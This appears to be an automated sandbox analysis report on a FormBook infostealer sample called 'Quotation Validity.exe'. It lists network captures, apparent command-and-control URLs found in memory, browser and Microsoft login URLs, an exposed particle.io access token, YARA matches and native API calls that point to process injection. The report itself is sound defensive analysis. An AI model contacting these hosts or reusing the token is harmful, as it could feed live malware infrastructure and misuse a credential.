2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:45:59 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Mon, 02 Dec 2024 13:46:11 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Mon, 02 Dec 2024 13:46:14 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Mon, 02 Dec 2024 13:46:16 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Mon, 02 Dec 2024 13:46:19 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 6d 34 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dm4p/ was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Mon, 02 Dec 2024 13:46:27 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Mon, 02 Dec 2024 13:46:29 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Mon, 02 Dec 2024 13:46:32 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Mon, 02 Dec 2024 13:46:35 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: KnETAajUsFuuTQ.exe, 0000000D.00000002.3732486817.0000000002F48000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/6ou6/?_jVx=rlV0_TQ81&6NVpdLF=We72k2U8RqyHNx9c0lgrcMajP
                      Source: KnETAajUsFuuTQ.exe, 0000000D.00000002.3734770459.0000000004CE7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartcongress.net
                      Source: KnETAajUsFuuTQ.exe, 0000000D.00000002.3734770459.0000000004CE7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartcongress.net/qtfx/
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: Quotation Validity.exeString found in binary or memory: https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: isoburn.exe, 0000000C.00000002.3730207488.000000000313A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3730207488.0000000003119000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: isoburn.exe, 0000000C.00000002.3730207488.000000000313A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: isoburn.exe, 0000000C.00000003.1891343530.0000000003141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                      Source: isoburn.exe, 0000000C.00000002.3730207488.0000000003119000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: isoburn.exe, 0000000C.00000002.3730207488.0000000003119000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033T
                      Source: isoburn.exe, 0000000C.00000002.3730207488.000000000313A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.3730207488.0000000003119000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: isoburn.exe, 0000000C.00000002.3730207488.000000000313A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1891343530.0000000003141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: isoburn.exe, 0000000C.00000003.1889442432.00000000080B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: isoburn.exe, 0000000C.00000002.3733320595.00000000059D6000.00000004.10000000.00040000.00000000.sdmp, KnETAajUsFuuTQ.exe, 0000000D.00000002.3732486817.0000000002DB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cstrategy.online/qx5d/?6NVpdLF=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: isoburn.exe, 0000000C.00000003.1897097695.0000000008188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 9.2.Quotation Validity.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Quotation Validity.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000002.3734770459.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1713438377.0000000003BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3729826562.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3732445014.0000000004AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1704236127.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3732187285.0000000002910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: Quotation Validity.exe
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0042C663 NtClose,9_2_0042C663
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B35C0 NtCreateMutant,LdrInitializeThunk,9_2_013B35C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2B60 NtClose,LdrInitializeThunk,9_2_013B2B60
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_013B2DF0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_013B2C70
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B3010 NtOpenDirectoryObject,9_2_013B3010
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B3090 NtSetValueKey,9_2_013B3090
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B4340 NtSetContextThread,9_2_013B4340
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B4650 NtSuspendThread,9_2_013B4650
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B39B0 NtGetContextThread,9_2_013B39B0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2BA0 NtEnumerateValueKey,9_2_013B2BA0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2B80 NtQueryInformationFile,9_2_013B2B80
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2BF0 NtAllocateVirtualMemory,9_2_013B2BF0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2BE0 NtQueryValueKey,9_2_013B2BE0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2AB0 NtWaitForSingleObject,9_2_013B2AB0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2AF0 NtWriteFile,9_2_013B2AF0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2AD0 NtReadFile,9_2_013B2AD0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2D30 NtUnmapViewOfSection,9_2_013B2D30
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2D10 NtMapViewOfSection,9_2_013B2D10
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B3D10 NtOpenProcessToken,9_2_013B3D10
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2D00 NtSetInformationFile,9_2_013B2D00
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B3D70 NtOpenThread,9_2_013B3D70
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2DB0 NtEnumerateKey,9_2_013B2DB0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2DD0 NtDelayExecution,9_2_013B2DD0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2C00 NtQueryInformationProcess,9_2_013B2C00
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2C60 NtCreateKey,9_2_013B2C60
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2CA0 NtQueryInformationToken,9_2_013B2CA0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2CF0 NtOpenProcess,9_2_013B2CF0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2CC0 NtQueryVirtualMemory,9_2_013B2CC0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2F30 NtCreateSection,9_2_013B2F30
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2F60 NtCreateProcessEx,9_2_013B2F60
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2FB0 NtResumeThread,9_2_013B2FB0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2FA0 NtQuerySection,9_2_013B2FA0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2F90 NtProtectVirtualMemory,9_2_013B2F90
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2FE0 NtCreateFile,9_2_013B2FE0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B2E30 NtWriteVirtualMemory,9_2_013B2E30
